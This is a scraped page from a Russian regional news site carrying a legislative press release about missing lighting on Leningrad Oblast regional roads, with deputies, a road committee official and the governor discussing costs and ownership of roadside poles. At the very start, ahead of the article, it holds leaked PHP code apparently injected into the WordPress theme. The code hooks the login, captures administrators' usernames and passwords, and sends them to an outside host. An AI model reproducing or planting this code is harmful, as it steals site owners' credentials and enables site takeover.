if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } Депутат ЗакС Татьяна Бездетко обеспокоена отсутствием освещения на дорогах — Гатчинка.рф
Home » ЖКХ » Депутат ЗакС Татьяна Бездетко обеспокоена отсутствием освещения на дорогах
Тёмная дорога

Депутат ЗакС Татьяна Бездетко обеспокоена отсутствием освещения на дорогах

 На прошедшей  встрече депутатов Законодательного собрания с Губернатором области председатель постоянной комиссии по социальной политике и трудовым отношениям Татьяна Бездетко задала вопрос об организации освещения региональных дорог в черте населённых пунктов.

Как отметила депутат, в большинстве своем региональные дороги, проходящие через населённые пункты, ввиду исторически сложившейся ситуации оказываются достаточно узкими без возможности организации тротуаров и со сложностями в организации освещения. В результате жители вынуждены перемещаться вдоль дорог с интенсивным движением в полной темноте. Татьяна Викторовна  привела пример Большеколпанского сельского поселения, где проблема освещенности дорог стоит особенно остро. Чтобы сдвинуть эту проблему с мертвой точки, считает депутат, необходима глубокая её проработка совместно с Ленэнерго.

Отвечая на вопрос, заместитель председателя комитета по дорожному хозяйству Ленинградской области Сергей Алексеев отметил, что количество населённых пунктов, проходящих вдоль автодорог регионального значения и подлежащих обустройству стационарным электрическим освещением, составляет более 1500.

По приблизительным оценкам, общая потребность в бюджетных средствах для выполнения строительно-монтажных работ по устройству наружного электроосвещения таких автодорог по всей Ленинградской области, составляет более 22 млрд руб. (без учета выкупа прилегающих к автодороге земельных участков).

На основании исковых заявлений, в отношении комитета по дорожному хозяйству и подведомственных организаций вынесены судебные решения, требующие незамедлительного обустройства освещения в границах населённых пунктов. Разработан перечень объектов, подлежащих обустройству в приоритетном порядке, исходя из необходимости неукоснительного исполнения решений судов. Потребность в финансировании указанных объектов составляет порядка 4,5 млрд руб. Помимо решений судов, в настоящее время разработан перечень объектов подлежащих обустройству на основании представлений ГИБДД на ориентировочную сумму 4,7 млрд руб.

Выступающий согласился с Татьяной Бездетко, что имеется негативная практика стеснённых условий в населённых пунктах, связанная с близким расположением заборов индивидуальных жилых строений, а также опор линий электроснабжения, не стоящих на балансе подведомственной организации, как в полосе отвода, так и практически по краю земляного полотна автодороги.

Сергей Алексеев заверил, что уже сейчас с целью оперативного освещения автодорог прорабатывается вопрос с ПАО «Россети Ленэнерго» о возможности двойного использования опор линий электропередач по конкретным адресам. Выступающий высказал предложение о создании государственной архитектурно-технической инспекции — органа, который мог бы регулировать вопросы благоустройства придорожных территорий, содержания полос отвода, борьбы с борщевиком на придорожных территориях.

Депутат Михаил Коломыцев обратил внимание представителя комитета на необходимость устранения правовой неопределенности в определении собственника «движимого» дорожного имущества (опоры освещения и пр.). В настоящее время «движимое» имущество региональных дорог, проходящих через населенные пункты, в большинстве случаев находится в плачевном состоянии. Муниципалы готовы бы и взять его на баланс, но юридически не имеют на это право, так как этот объект не является недвижимостью и находится в полосе отвода дороги.

Подводя итог обсуждению этого вопроса, Губернатор поддержал депутатов в том, что необходимо выработать юридическое решение об определении собственника «движимого» дорожного имущества. Глава региона также обратил внимание профильного комитета на то, что к 2030 году необходимо добиться не 50% освещенности региональных дорог, проходящих через населенные пункты (как прогнозирует комитет), а, как минимум, 70%. А для этого важно проанализировать, в чем проблема недостаточного выполнения этих работ, какие ещё нужны ресурсы, изучить технические возможности подрядчика. Ведь в идеале — любая дорога, проходящая по населенному пункту должна быть освещена.

Пресс-служба Законодательного собрания Ленинградской области

More 388 posts in ЖКХ
Recommended for you
Компьютер
В Ленобласти появится новая диспетчерская служба

Губернатор Ленинградской области Александр Дрозденко поручил создать Единую дежурно-диспетчерскую службу по работе с авариями на...